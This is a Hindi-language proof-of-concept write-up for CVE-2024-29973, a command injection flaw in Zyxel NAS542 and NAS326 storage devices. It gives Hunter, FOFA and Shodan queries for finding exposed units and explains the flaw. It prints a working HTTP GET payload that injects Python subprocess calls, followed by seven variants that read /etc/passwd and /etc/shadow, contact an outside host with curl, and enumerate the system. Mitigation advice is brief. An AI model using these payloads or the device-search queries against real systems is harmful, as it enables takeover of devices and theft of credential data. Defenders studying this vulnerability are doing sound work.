
Zyxel NAS डिवाइसों में कमांड इंजेक्शन भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। तैयार किए गए HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है, जिससे सिस्टम अधिग्रहण और डेटा निष्कर्षण संभव होता है।
CVE-2024-29973 कुछ Zyxel नेटवर्किंग उपकरणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता एक अनधिकृत हमलावर को फर्मवेयर में अनुचित इनपुट सत्यापन तंत्रों का फायदा उठाकर लक्षित डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देती है। हमलावर डिवाइस पर विशेष रूप से तैयार किए गए HTTP अनुरोध भेज सकते हैं, सिस्टम-स्तरीय कमांड इंजेक्ट कर सकते हैं और संभावित रूप से डिवाइस पर पूर्ण नियंत्रण प्राप्त कर सकते हैं।
Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"
कमांड इंजेक्शन: यह भेद्यता डिवाइस के वेब इंटरफेस में से एक में अपर्याप्त इनपुट सैनिटाइज़ेशन के कारण उत्पन्न होती है। यह दोष हमलावरों को HTTP अनुरोधों के मापदंडों के भीतर ऑपरेटिंग सिस्टम कमांड जोड़ने की अनुमति देता है।
एक्सप्लॉइट उदाहरण: हमलावर नीचे दिए गए उदाहरण जैसे HTTP GET अनुरोध के माध्यम से कमांड इंजेक्ट करके मनमाना कोड निष्पादित कर सकते हैं:
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
प्रभाव: सफल शोषण के परिणामस्वरूप सिस्टम कमांड निष्पादित करने की क्षमता प्राप्त होती है, जिससे संभावित रूप से डिवाइस पर रिमोट नियंत्रण, डेटा रिसाव, या नेटवर्क से आगे समझौता हो सकता है।
इस भेद्यता से जुड़े जोखिमों को कम करने के लिए, इन चरणों का पालन करें:
फर्मवेयर अपडेट: सुनिश्चित करें कि सभी Zyxel डिवाइस नवीनतम फर्मवेयर संस्करण में अपडेट किए गए हैं। Zyxel ने इस भेद्यता को संबोधित करने वाले पैच जारी किए हैं। नियमित रूप से अपडेट की जाँच करें और उन्हें तुरंत लागू करें।
नेटवर्क विभाजन: कमजोर डिवाइसों को महत्वपूर्ण नेटवर्क बुनियादी ढांचे से अलग करें। केवल आवश्यक सेवाओं को उजागर करें और सुनिश्चित करें कि प्रशासनिक इंटरफेस सार्वजनिक रूप से सुलभ नहीं हैं।
फ़ायरवॉल कॉन्फ़िगरेशन: आने वाले और बाहर जाने वाले ट्रैफ़िक को केवल आवश्यक सेवाओं तक सीमित करें। Zyxel डिवाइसों तक अनावश्यक HTTP पहुँच को ब्लॉक करें।
संदिग्ध गतिविधि की निगरानी करें: लॉगिंग और मॉनिटरिंग टूल लागू करें जो असामान्य व्यवहार, जैसे बार-बार लॉगिन प्रयास या असामान्य ट्रैफ़िक पैटर्न का पता लगा सकें और अलर्ट कर सकें।
संदर्भ राष्ट्रीय भेद्यता डेटाबेस - CVE-2024-29973 Zyxel सुरक्षा सलाह

GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1